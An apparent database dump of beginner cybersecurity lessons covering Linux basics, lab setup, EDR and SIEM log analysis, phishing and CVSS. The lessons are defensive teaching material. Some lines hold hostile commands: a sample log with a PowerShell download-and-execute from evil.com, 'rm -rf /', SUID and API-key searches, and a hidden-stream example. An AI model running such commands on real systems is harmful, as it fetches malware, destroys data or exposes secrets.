(2, 2, '## Threats, Vulnerabilities, and Exploits\n\nThe \"Holy Trinity\" of InfoSec. You must master these definitions.\n\n### 1. Vulnerability (The Lock is Broken)\nA flaw or weakness in system security procedures, design, implementation, or internal controls.\n*   **Software Vulns**: SQL Injection, Buffer Overflow.\n*   **Hardware Vulns**: Meltdown/Spectre (CPU flaws).\n*   **Human Vulns**: Gullibility (Phishing), Laziness (Weak passwords).\n*   **CVE (Common Vulnerabilities and Exposures)**: The global ID system for vulns. e.g., `CVE-2021-44228` (Log4j).\n\n### 2. Threat (The Thief)\nAny circumstance or event with the potential to adversely impact operations.\n*   **Adversarial Threats**: Hackers, Nation States, Insiders.\n*   **Environmental Threats**: Floods, Earthquakes, Power Failure.\n*   **Accidental Threats**: Users deleting the wrong database.\n\n### 3. Exploit (The Key)\nCode or a technique that takes advantage of a vulnerability.\n*   **Zero-Day Exploit**: An exploit for a vulnerability that the vendor (e.g., Microsoft) does **not** know about yet. There is no patch. These are worth millions on the black market.\n*   **Public Exploit**: Code available on Exploit-DB or GitHub.\n\n---\n\n### The Equation of Risk\n> **Risk = Threat × Vulnerability × Impact**\n\n*   **Scenario A**:\n    *   Threat: High (Nation State).\n    *   Vuln: High (Unpatched Server).\n    *   Impact: High (Database with all customer SSNs).\n    *   **Result**: CRITICAL RISK.\n\n*   **Scenario B**:\n    *   Threat: High.\n    *   Vuln: High.\n    *   Impact: Low (The server hosts the cafeteria menu).\n    *   **Result**: LOW RISK.\n\n**Risk Management** is about lowering one of these variables.\n*   We can\'t lower the **Threat** (Hackers exist).\n*   We can lower the **Vuln** (Patching).\n*   We can lower the **Impact** (Network Segmentation, Backups).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'),
(3, 3, '## Careers in Cybersecurity\n\nThe field is massive. It is not just \"Hacking\".\n\n### 1. The Blue Team (Defenders)\nThey build, monitor, and defend. 80% of jobs are here.\n*   **SOC Analyst (Tier 1/2/3)**: The first line of defense. Monitors logs, triages alerts. \"The Firefighter\".\n*   **Security Engineer**: Builds the tools. Configures Firewalls (Palo Alto), SIEMs (Splunk), and EDRs (CrowdStrike).\n*   **Incident Responder (IR)**: The SWAT team. Called in when a breach is confirmed to kick the attacker out.\n*   **Threat Hunter**: Proactively searches for threats that evaded the SOC.\n\n### 2. The Red Team (Offense)\nAuthorized hackers who test defenses.\n*   **Penetration Tester**: Hired to break into a specific app or network to find bugs.\n*   **Red Teamer**: Simulation of a full adversary (APT). They might phish employees, clone badges, or break windows.\n\n### 3. Engineering & GRC\n*   **DevSecOps**: Writes secure code and builds security into the pipeline.\n*   **GRC (Governance, Risk, Compliance)**: Policy writers. Auditors. They ensure the company follows laws (GDPR, HIPAA) and standards (ISO 27001). \"The Lawyers of Cyber\".\n\n---\n\n### Certificates vs Degrees\nCybersecurity is a meritocracy. Practical skills often outweigh degrees.\n*   **Entry Level**: CompTIA Security+, Network+.\n*   **Technical**: OSCP (PenTesting), BTL1 (Blue Team), CCNA (Networking).\n*   **Management**: CISSP (The \"Gold Standard\" for HR filters, but less technical).\n\n### How to Start?\n1.  **Learn Linux**: It is the OS of the internet.\n2.  **Learn Networking**: You can\'t hack a network if you don\'t know how IP packets work.\n3.  **Build a Lab**: Set up VirtualBox with Kali Linux and a vulnerable target (Metasploitable).', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-29 13:58:57'),
(4, 4, '\n## 🎯 Learning Objective\n\nUnderstand **Quiz: Cybersecurity Basics** and its role in modern cybersecurity operations.\n\n---\n\n## 📖 Core Concept\n\nQuiz: Cybersecurity Basics is a foundational element of security.\n\n### What is it?\nQuiz: Cybersecurity Basics involves:\n- **Identification**: Recognizing patterns\n- **Analysis**: Understanding impact\n- **Mitigation**: Reducing risk\n\n### Why it Matters\nWithout Quiz: Cybersecurity Basics, organizations cannot effectively defend against threats.\n\n---\n\n## ⚡ Quick Facts\n\n- **Criticality**: High\n- **Frequency**: Daily\n- **Impact**: Operational Security\n\n---\n\n## 🛠️ Analyst Workflow\n\n1. **Monitor**: Watch for indicators\n2. **Analyze**: Verify context\n3. **Escalate**: If confirmed threat\n\n---\n\n## 📝 Summary\n\nMastering **Quiz: Cybersecurity Basics** is essential for Level 1 SOC analysts.\n', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-26 14:39:59'),
(5, 5, '## Setting Up Your Lab\n\nYou cannot learn hacking by reading. You must **do**.\nA Home Lab is safe place to break things.\n\n### The Virtualization Hypervisor\nAllows you to run multiple Operating Systems on one physical computer.\n*   **VirtualBox**: Free, Open Source. (Recommended).\n*   **VMware Workstation Player**: Free for personal use. fast.\n\n### The Attack Box: Kali Linux\nA Debian-based Linux distribution pre-installed with 600+ hacking tools.\n*   **Nmap**: Scanner.\n*   **Metasploit**: Exploit Framework.\n*   **Wireshark**: Packet Sniffer.\n*   **Burp Suite**: Web Proxy.\n*   *Download*: Get the \"VirtualBox Image\" from kali.org. Do not install the ISO unless you are comfortable.\n\n### The Victim Box: Metasploitable 2\nAn intentionally vulnerable Linux machine.\n*   It has open ports, weak passwords, and old web apps.\n*   **WARNING**: Never expose Metasploitable to the internet (Bridge Mode). Always use \"Host Only\" or \"NAT Network\" mode in VirtualBox. If you expose it, **you will be hacked**.\n\n### Network Modes\n1.  **NAT**: VM creates a private network inside the host. Can access internet. Safe.\n2.  **Bridged**: VM gets an IP from your home Router. It sits next to your laptop. Risky for vulnerable VMs.\n3.  **Host-Only**: Isolated network. VM can only talk to Host and other VMs. Most Secure.\n\n### Lab Exercise\n1.  Install VirtualBox.\n2.  Import Kali Linux.\n3.  Import Metasploitable.\n4.  Set both to \"NAT Network\".\n5.  Ping Metasploitable from Kali.', 'markdown', 3, '2025-12-26 01:52:35', '2025-12-29 13:58:57'),
(6, 6, '## Linux Navigation\n\nLinux powers 90% of the internet\'s servers, 100% of supercomputers, and most hacking tools. If you can\'t use the terminal, you can\'t do cyber.\n\n### The File System Hierarchy\nLinux does not have `C:`. It starts at Root `/`.\n*   `/` **(Root)**: The base.\n*   `/home`: User directories. (e.g., `/home/baris`). Equivalent to `C:Users`.\n*   `/etc`: Configuration files. (e.g., `/etc/passwd`).\n*   `/var`: Variable data (Logs live in `/var/log`).\n*   `/bin`: Binaries (Programs) like `ls`, `cat`.\n*   `/tmp`: Temporary files. Cleared on reboot.\n\n### Basic Commands\n1.  `pwd` (**Print Working Directory**): Where am I?\n    *   Output: `/home/kali`\n2.  `ls` (**List**): Show files.\n    *   `ls -l`: Long listing (Permissions, Size, Owner).\n    *   `ls -a`: All files (Including hidden files starting with `.`).\n    *   `ls -la`: Hidden + Long. (Muscle memory).\n3.  `cd` (**Change Directory**): Move.\n    *   `cd Downloads`: Go to Downloads.\n    *   `cd ..`: Go up one level.\n    *   `cd ~`: Go home.\n    *   `cd /`: Go to root.\n\n### Absolute vs Relative Paths\n*   **Absolute**: Full address. Always works.\n    *   `cd /var/log/apache2`\n*   **Relative**: Relative to where you are.\n    *   If you are in `/var`, you can type `cd log`.\n\n### Exercise\nOpen your terminal.\n1.  Type `pwd`.\n2.  Type `cd /etc`.\n3.  Type `ls`. Look for `passwd`.\n4.  Type `cd ..` to go back to root.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(7, 7, '## Touching Files\n\nCreating, Moving, and Destroying files.\n\n### Creating\n1.  `touch file.txt`: Creates an empty file.\n2.  `mkdir foldername`: Creates a directory (Make Directory).\n3.  `echo \"Hello\" > file.txt`: Creates a file containing \"Hello\".\n\n### Reading\n1.  `cat file.txt`: Dumps the whole file to screen. Good for small files.\n2.  `less file.txt`: Opens a paginated viewer. Scroll with arrows. Quit with `q`. Good for huge logs.\n3.  `head file.txt`: Shows first 10 lines.\n4.  `tail file.txt`: Shows last 10 lines.\n    *   `tail -f /var/log/syslog`: **Follow**. Shows new lines as they are written in real-time. Crucial for debugging.\n\n### Moving & Renaming\nLinux uses `mv` for both.\n*   **Move**: `mv file.txt /tmp/` (Moves file to tmp).\n*   **Rename**: `mv file.txt newname.txt` (Moves file to same place with new name).\n\n### Copying\n*   `cp file.txt file_backup.txt`\n*   `cp -r folder/ folder_backup/` (Recursive copy for directories).\n\n### Deleting (The Dangerous Part)\n*   `rm file.txt`: Remove file. **There is no Recycle Bin**. It is gone.\n*   `rm -r folder/`: Remove directory.\n*   `rm -rf /`: **The Forbidden Command**. Recursively Force remove Root. Deletes the entire OS. Do not run this.\n\n### Hidden Files\nIn Linux, any file starting with `.` is hidden.\n*   `.bashrc`: Your shell configuration.\n*   `.ssh/`: Your keys.\nYou must use `ls -a` to see them.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(8, 8, '## Linux Permissions\n\nLinux is a multi-user OS. Permissions decide who can Read, Write, or Execute.\n\n### The Output of `ls -l`\nExample: `-rwxr-xr-- 1 owner group size date file`\n\nThe first part `rwxr-xr--` tells the story.\nIt is split into 3 groups of 3 characters:\n1.  **User (Owner)**: `rwx` (Read, Write, Execute).\n2.  **Group**: `r-x` (Read, Execute. No Write).\n3.  **Others (World)**: `r--` (Read only).\n\n### The Modes\n*   **r (Read)**:\n    *   File: View contents.\n    *   Dir: List contents (`ls`).\n*   **w (Write)**:\n    *   File: Modify/Delete content.\n    *   Dir: Create/Delete files inside it.\n*   **x (Execute)**:\n    *   File: Run as a program/script.\n    *   Dir: Enter the directory (`cd`).\n\n### Changing Permissions (`chmod`)\nYou can use numbers (Octal) or letters.\n\n**The Numbers**:\n*   Read = 4\n*   Write = 2\n*   Execute = 1\n*   Total = 7\n\n**Common Sets**:\n*   `chmod 777 file`: Everyone can do everything. **Insecure**.\n*   `chmod 700 file`: Only I (User) can read/write/run. Private keys usually need this.\n*   `chmod 755 file`: I can do all. Everyone else can Read/Run. (Standard for scripts).\n*   `chmod +x file`: Quick way to make a script executable.\n\n### Changing Owner (`chown`)\n*   `chown user:group file`\n*   `chown root:root /etc/shadow`', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(9, 9, '## Finding Files\n\nYou hacked a server. You want to find \"passwords.txt\". How?\n\n### 1. `locate`\nThe fast, indexed search.\n*   `locate password.txt`\n*   **Pros**: Instant.\n*   **Cons**: Relies on a database (`updatedb`). If the file was made 1 minute ago, locate won\'t find it.\n\n### 2. `find`\nThe powerful, real-time crawler.\n*   Syntax: `find [where] [filters] [action]`\n\n**Examples**:\n*   `find / -name \"flag.txt\"`: Search whole drive for flag.txt.\n*   `find /home -name \"*.conf\"`: Search home for configs.\n*   `find / -type f -size +100M`: Find files larger than 100MB.\n*   `find / -perm -4000 2>/dev/null`: Find SUID files (Privilege Escalation gold).\n    *   `2>/dev/null` hides \"Permission Denied\" errors so you only see clean results.\n\n### 3. `which`\nFinds executable binaries in your PATH.\n*   `which python`: Shows `/usr/bin/python`.\n*   If `which` returns nothing, the tool is not installed or not in PATH.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(10, 10, '## Grep (Global Regular Expression Print)\n\nGrep is the search tool for **content**. It finds text *inside* files.\n\n### Basic Usage\n*   `grep \"error\" /var/log/syslog`: Show me lines containing \"error\".\n*   `grep -i \"pass\" file.txt`: Case insensitive (finds \"Pass\", \"PASS\").\n*   `grep -r \"apikey\" /var/www/html/`: **Recursive**. Search every file in the website folder for \"apikey\".\n\n### Pipes (`|`)\nThe pipe takes the output of the Left command and feeds it to the Right command. It is the most powerful feature of Linux.\n\n*   `cat huge_log.txt | grep \"IP: 1.2.3.4\"`\n    *   1. Cat dumps the file.\n    *   2. Pipe catches it.\n    *   3. Grep filters it.\n*   `ls -la | grep \"Aug\"`: Show files modified in August.\n*   `history | grep \"ssh\"`: Search my command history for SSH connections.\n\n### Real World Scenario: Log Analysis\nYou are investigating a web server access log.\n1.  `cat access.log | grep \"404\"` (Find failures).\n2.  `cat access.log | grep \"admin.php\"` (Find attempts to access admin).\n3.  `cat access.log | awk \'{print $1}\' | sort | uniq -c | sort -nr`: (Count requests by IP address. The \"freq\" command stack).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(11, 11, '## Process Management\n\nEvery program running is a **Process**. Each has a unique **PID** (Process ID).\n\n### Viewing Processes\n1.  `ps`: List my processes.\n2.  `ps aux`: List **ALL** processes from all users.\n    *   **a**: All users.\n    *   **u**: User/owner column.\n    *   **x**: Processes not attached to a terminal (Daemons).\n3.  `top`: Real-time task manager (CPU/RAM usage).\n    *   Press `q` to quit.\n\n### Killing Processes\nSometimes a program crashes or you need to stop a malicious script.\n*   `kill [PID]`\n    *   Example: `kill 1234` (Polite kill request. SIGTERM).\n*   `kill -9 [PID]`\n    *   **Force Kill**. (SIGKILL). The nuclear option. The kernel rips the process out of memory.\n\n### Backgrounding\n*   **Foreground**: `ping google.com` -> Takes over your terminal.\n*   **Background**: `ping google.com &` -> Runs in background. Terminal is free.\n*   **Ctrl+Z**: Pauses current process.\n*   `bg`: Resumes paused process in background.\n*   `fg`: Brings background process to foreground.\n\n### Services (`systemctl`)\nDaemons that start at boot (like Apace/Nginx).\n*   `systemctl status apache2`\n*   `systemctl start apache2`\n*   `systemctl stop apache2`\n*   `systemctl enable apache2` (Start on boot).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(12, 12, '## Package Management\n\nInstalling software in Linux. We don\'t google \"download .exe\". We use Repositories (App Stores).\n\n### APT (Debian/Ubuntu/Kali)\n**Advanced Package Tool**.\n1.  `apt update`: Refreshes the list of available software. (Does NOT install updates).\n    *   *Analogy*: Checking the catalogue to see what is new.\n2.  `apt upgrade`: Actually installs the newer versions of installed packages.\n3.  `apt install [package]`: Installs a tool.\n    *   `apt install nmap`\n    *   `apt install python3`\n4.  `apt remove [package]`: Uninstalls.\n\n### Repositories\nYour OS looks in `/etc/apt/sources.list`.\nIf you try to install \"tool_xyz\" and it says \"Unable to locate package\", your sources.list might be missing the repository that contains it.\n\n### Other Managers\n*   **YUM / DNF**: Used by Red Hat / CentOS / Fedora.\n    *   `dnf install httpd`\n*   **Pacman**: Used by Arch Linux.\n    *   `pacman -S firefox`\n*   **Snap**: Universal packages.\n    *   `snap install discord`\n\n### Compile from Source (Github)\nSometimes a tool isn\'t in Apt. You must build it.\n1.  `git clone https://github.com/user/tool.git`\n2.  `cd tool`\n3.  Look for `README.md`!\n4.  Usually: `./configure`, `make`, `make install` OR `pip install -r requirements.txt` (Python).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(350, 349, '# 🦅 Understanding EDR Telemetry\n\nEndpoint Detection and Response (EDR) tools provide a flight recorder for your endpoints. They capture everything a computer does.\n\n## 📝 The Raw Log\nBelow is a raw JSON log from an EDR agent (e.g., CrowdStrike/SentinelOne style).\n\n```json\n{\n  \"event_type\": \"ProcessRoleup2\",\n  \"timestamp\": \"2024-03-15T10:45:22Z\",\n  \"hostname\": \"FINANCE-PC-01\",\n  \"user_name\": \"CORP\\\\asmith\",\n  \"file_name\": \"powershell.exe\",\n  \"file_path\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n  \"command_line\": \"powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString(\'http://evil.com/payload.ps1\')\"\",\n  \"parent_process\": \"winword.exe\",\n  \"parent_command_line\": \"\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE\" C:\\\\Users\\\\asmith\\\\Downloads\\\\Invoice_UPDATED.docx\",\n  \"sha256\": \"9f9d5187af9e...\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze the Hierarchy (Parent-Child)\n* **Parent**: `winword.exe` (Microsoft Word)\n* **Child**: `powershell.exe`\n* **Analysis**: Word documents should **never** spawn PowerShell. This is a classic sign of a **Malicious Macro**.\n\n### Step 2: Decode the Command Line\n* `-nop`: NoProfile (Hides awareness from user).\n* `-w hidden`: WindowStyle Hidden (User sees nothing).\n* `IEX`: Invoke-Expression (Execute code).\n* `DownloadString`: Fetch code from the internet.\n\n### Step 3: Check the Context\n* **User**: `asmith` (Finance Dept).\n* **Document**: `Invoice_UPDATED.docx`.\n* **Conclusion**: User opened a phishing email with a weaponized invoice.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(351, 350, '# 🌳 Analyzing Process Trees\n\nVisualizing the chain of execution is critical.\n\n## 📝 The Raw Log\nA series of events joined by process ID (PID).\n\n```text\n[TIME: 14:00:01] PID: 1044 | svchost.exe (System Service)\n    └── [TIME: 14:00:05] PID: 2055 | cmd.exe /c \"whoami\"\n        └── [TIME: 14:00:06] PID: 3100 | conhost.exe\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Identify the Root\n* **Root**: `svchost.exe`. This is a generic Windows service host.\n* **Issue**: `svchost.exe` launching `cmd.exe` is highly suspicious. It usually points to a compromised service (like a vulnerability in SMB or a web server running as system).\n\n### Step 2: Check the Child Activity\n* **Command**: `whoami`.\n* **Context**: This is a \"Discovery\" command. Attackers run it immediately after getting shell access to see who they are (SYSTEM vs User).\n\n### Step 3: The \"Conhost\"\n* `conhost.exe` is normal when `cmd` runs. It handles the console window.\n\n### 🔴 Assessment\nThis looks like a **Reverse Shell** or **Remote Code Execution (RCE)** exploit.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(352, 351, '# 🦀 Detecting Lateral Movement\n\nAfter compromising one machine, attackers move sideways to find the Crown Jewels (Domain Controller).\n\n## 📝 The Raw Log (PsExec Event)\n\n```xml\n<Event xmlns=\'http://schemas.microsoft.com/win/2004/08/events/event\'>\n  <System>\n    <EventID>7045</EventID>\n    <Computer>HR-LAPTOP-04</Computer>\n  </System>\n  <EventData>\n    <Data Name=\'ServiceName\'>PSEXESVC</Data>\n    <Data Name=\'ImagePath\'>%SystemRoot%\\PSEXESVC.exe</Data>\n    <Data Name=\'ServiceType\'>user mode service</Data>\n    <Data Name=\'StartType\'>demand start</Data>\n    <Data Name=\'AccountName\'>LocalSystem</Data>\n  </EventData>\n</Event>\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze Event 7045\n* **Event 7045**: A new service was installed.\n* **ServiceName**: `PSEXESVC`.\n* **Significance**: This is the default service name for **PsExec**, a tool often used by admins but LOVED by hackers for moving laterally.\n\n### Step 2: Contextualize\n* Did authorized IT staff deploy software at this time?\n* If NO, an attacker effectively \"remote controlled\" this machine from another infected host.\n\n### Step 3: Find the Source\n* Look for successful network logins (Event 4624, Type 3) occurring just before this event to find the **Patient Zero** IP.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(353, 352, '# 💉 Memory Injection Techniques\n\nFileless malware doesn\'t write to disk. It lives in RAM.\n\n## 📝 The Raw Log (Sysmon Event 8)\n\n```json\n{\n  \"event_id\": 8,\n  \"desc\": \"CreateRemoteThread\",\n  \"source_image\": \"C:\\Users\\Bob\\AppData\\Local\\Temp\\malware.exe\",\n  \"target_image\": \"C:\\Windows\\System32\\explorer.exe\",\n  \"target_process_id\": \"4022\",\n  \"start_address\": \"0xDEADBEEF\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The \"Injector\"\n* **Source**: `malware.exe` running from `Temp`.\n* **State**: This is the malicious dropper.\n\n### Step 2: The \"Victim\"\n* **Target**: `explorer.exe`. This is the Windows desktop/file manager. It is *always* running.\n* **Action**: `CreateRemoteThread`. The source is forcing the target to run code.\n\n### Step 3: The Result\n* Once injected, `malware.exe` can delete itself.\n* The malicious code now runs INSIDE `explorer.exe`.\n* **Implication**: You will see `explorer.exe` making network connections to Russia. If you kill `explorer`, you kill the user\'s desktop session.\n\n### 🛡️ Response\nDo not just kill the process. Isolate the host and run memory forensics.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(354, 353, '# 🛑 Isolating Infected Hosts\n\nTime is money. The faster you act, the less damage occurs.\n\n## 📝 The Response Log (Audit Trail)\n\n```json\n{\n  \"action\": \"ResponseAction\",\n  \"type\": \"NetworkContainment\",\n  \"status\": \"Success\",\n  \"target_host\": \"FINANCE-PC-01\",\n  \"initiator\": \"Analyst_Baris\",\n  \"timestamp\": \"2024-03-15T10:55:00Z\",\n  \"policy\": {\n    \"allow_dns\": false,\n    \"allow_edr_cloud\": true,\n    \"allow_all_else\": false\n  }\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Verification\n* **Action**: `NetworkContainment`.\n* **Policy**: The log confirms that the host can ONLY talk to the EDR cloud (`allow_edr_cloud: true`). This is vital. You don\'t want to lose your own access!\n\n### Step 2: What happens next?\n* The attacker loses their C2 connection.\n* **Active shells die**.\n* **Data exfiltration stops**.\n* The user sees \"No Internet\".\n\n### Step 3: Remediation\n1. **Live Response**: Connect via EDR shell.\n2. **Collect Artifacts**: Get the `Invoice_UPDATED.docx` file.\n3. **Re-image**: Wipe the machine. Better safe than sorry.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(360, 359, '# 🔎 Writing SPL\n\nSearch Processing Language (SPL) is the standard for querying big data in Splunk.\n\n## 📝 The Scenario\nYour boss says \"Find all failed logins from China in the last 24 hours.\"\n\n## 📝 The Raw Query (SPL)\n\n```splunk\nindex=main sourcetype=wineventlog:security EventCode=4625 \n| iplocation SourceNetworkAddress \n| search Country=\"China\"\n| stats count by SourceNetworkAddress, User\n| sort - count\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Filter Phase\n* `index=main`: Search only the main storage.\n* `EventCode=4625`: Windows Failed Identity.\n\n### Step 2: Enrichment\n* `iplocation`: Splunk automatically adds `Country`, `City`, `Lat`, `Lon` based on the IP address.\n\n### Step 3: Aggregation\n* `stats count by...`: Instead of showing 10,000 individual log lines, show me a table.\n* **Row 1**: IP `1.2.3.4`, User `Admin`, Count `500`.\n* **Conclusion**: We are under a brute force attack.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(361, 360, '# 🔗 Correlating Events\n\nA single log is a dot. Correlation connects the dots to make a picture.\n\n## 📝 The Raw Logs (Sequence)\n\n```text\n[09:00:01] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:02] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:03] Failed Login (User: Bob, IP: 10.0.0.50)\n... (50 more times)\n[09:01:00] Successful Login (User: Bob, IP: 10.0.0.50)\n[09:01:05] User Created (User: Admin2, By: Bob)\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Brute Force\n* The first block is a classic brute force attack.\n\n### Step 2: The Breakthrough\n* `[09:01:00]`: The attack succeeded. They guessed the password.\n\n### Step 3: Persistence\n* `[09:01:05]`: The very first thing the attacker did was create a BACKDOOR user (`Admin2`).\n* **Why**: Even if Bob changes his password, the attacker can still login as Admin2.\n\n### Step 4: The Correlation Rule\n* `Trigger Alert IF (Failed_Login > 10 in 5 mins) FOLLOWED BY (Successful_Login)`.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(368, 367, '# 🎣 Phishing Types\n\n## 📝 The Scenario\n**Email 1**: \"Dear Customer, your Netflix is expired. Click here.\"\n**Email 2**: \"Hi Bob, I enjoyed our meeting about Project X in London. Please review the attached contract.\"\n\n## 🕵️‍♂️ Investigation Steps\n\n### Analysis of Email 1 (Bulk Phishing)\n* **Greeting**: Generic (\"Dear Customer\").\n* **Urgency**: High (\"Expired\").\n* **Targeting**: None. Sent to millions.\n\n### Analysis of Email 2 (Spear Phishing)\n* **Greeting**: Personalized (\"Hi Bob\").\n* **Context**: specific (\"Project X\", \"London\").\n* **Source**: The attacker likely researched Bob on LinkedIn.\n* **Danger**: Extremely high. Users trust context.\n\n### 🛡️ Defense\nFor Spear Phishing, you rely on **User Awareness Training**. Technology often misses the context, but a human might spot that \"Project X\" was cancelled last week.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(369, 368, '# 🔗 URL Analysis\n\n## 📝 The Raw Link\n`http://www.paypal.com.secure-login-updates.xyz/login.php`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The Root Domain\n* **Reading**: Read from Right to Left.\n* **TLD**: `.xyz` (Cheap, often malicious).\n* **Domain**: `secure-login-updates.xyz`.\n* **Subdomains**: `www.paypal.com`.\n\n### Step 2: Homoglyphs\n* Look closely at: `pаypal.com`.\n* The \'a\' might be a Cyrillic character (IDN Homograph Attack). Use a \"Punycode Converter\" to check.\n* Real: `paypal.com`.\n* Fake: `xn--pypal-4ve.com`.\n\n### Step 3: Sandboxing\n* Paste the URL into **UrlScan.io**.\n* Look at the screenshot. Does it look like the real PayPal login page?\n* If yes, it is a credential harvester.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(370, 369, '# 💯 CVSS Scoring System\n\nUnderstanding the Common Vulnerability Scoring System (v3.1).\n\n## 📝 The Raw Vector\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Attack Vector (AV)\n* **AV:N (Network)**: The vulnerability can be exploited remotely over the internet. (BAD)\n* **AV:P (Physical)**: You need to touch the device (USB). (Less critical).\n\n### Step 2: Complexity & Privileges\n* **AC:L (Low Complexity)**: A script kiddie can do it.\n* **PR:N (None)**: No login required.\n* **UI:N (None)**: No user interaction required.\n\n### Step 3: CIA Impact\n* **C:H (Confidentiality High)**: They steal all data.\n* **I:H (Integrity High)**: They change all data.\n* **A:H (Availability High)**: They delete everything.\n\n### Score\n* **9.8 CRITICAL**. Drop everything and patch this.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(371, 370, '# 🏥 Prioritizing Patches\n\nYou have 10,000 vulnerabilities. You can patch 50. Which ones?\n\n## 📝 The Scenario\n1. **Server A**: Internal Test Server. Vulnerability: Score 10.0 (RCE).\n2. **Server B**: External Web Server. Vulnerability: Score 7.5 (SQLi).\n\n## 🕵️‍♂️ Decision Steps\n\n### Step 1: Exposure\n* **Server B** is reachable from the internet. Attackers are scanning it 24/7.\n* **Server A** is behind a firewall. Attackers need to be inside first.\n\n### Step 2: Exploitability\n* Is there a Metasploit module for the SQLi? Yes.\n* Is the RCE theoretical? Yes.\n\n### Step 3: Business Impact\n* If Web Server goes down, we lose money.\n* If Test Server goes down, devs preserve coffee.\n\n### 🏆 Verdict\n**Patch Server B first**. Context matters more than raw score.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(391, 32, '## Windows File System\n\nUnlike Linux (start at `/`), Windows starts at a Drive Letter, usually `C:`.\n\n### Key Directories\n1.  `C:Windows`: The OS core.\n    *   `System32`: Critical DLLs and Executables. (Note: On 64-bit systems, System32 contains 64-bit files. `SysWOW64` contains 32-bit files. Confusing, but legacy.)\n2.  `C:Users`: User profiles.\n    *   `C:UsersBobDesktop`, `Downloads`, etc.\n    *   `AppData`: Hidden folder storing app settings (Chrome history, Discord cache). Great for forensics.\n3.  `C:Program Files`: Where 64-bit apps live.\n4.  `C:Program Files (x86)`: Where 32-bit apps live.\n5.  `C:PerfLogs`: Performance logs. Often empty, but sometimes writable by everyone (PrivEsc vector!).\n\n### ADS (Alternate Data Streams)\nA hidden feature of NTFS. A file can have \"sub-files\" hidden behind it.\n*   `echo \"Hidden Data\" > innocent.txt:secret.txt`\n*   `innocent.txt` looks normal. 0 bytes change.\n*   Hackers use ADS to hide malware inside benign files.\n*   **Detection**: `dir /R` shows streams.\n\n### Permissions (ICACLS)\nWindows uses ACLs (Access Control Lists).\n*   **Full Control**: God mode.\n*   **Modify**: Read/Write/Delete.\n*   **Read & Execute**: Run programs.\n*   **tool**: `icacls file.txt` (View permissions).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(392, 33, '## User Account Control (UAC)\n\nIntroduced in Vista, UAC is the \"Dimmed Screen\" popup asking \"Do you want to allow this app to make changes?\".\n\n### The Concept\nEven if you are an Administrator, you run with \"Standard\" tokens most of the time. When you need to do a privileged action (like installing software), UAC pauses and asks for the \"Administrator\" token.\n*   **Integrity Levels**:\n    *   **System**: Kernel level. Highest.\n    *   **High**: Administrators (Elevated).\n    *   **Medium**: Standard Users (and Admin non-elevated).\n    *   **Low**: Sandboxed apps (Browser tabs).\n\n### UAC Bypass\nA common hacking technique. Malware tries to assume the High Integrity token without triggering the popup.\n*   **Fodhelper Exploit**: A built-in Windows binary that auto-elevates. Malware hijacks its registry keys to execute code as Admin silently.\n\n### Security Boundaries\nMicrosoft says UAC is **not** a security boundary. It is a convenience feature. If you are already Admin, UAC won\'t stop a sophisticated script.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
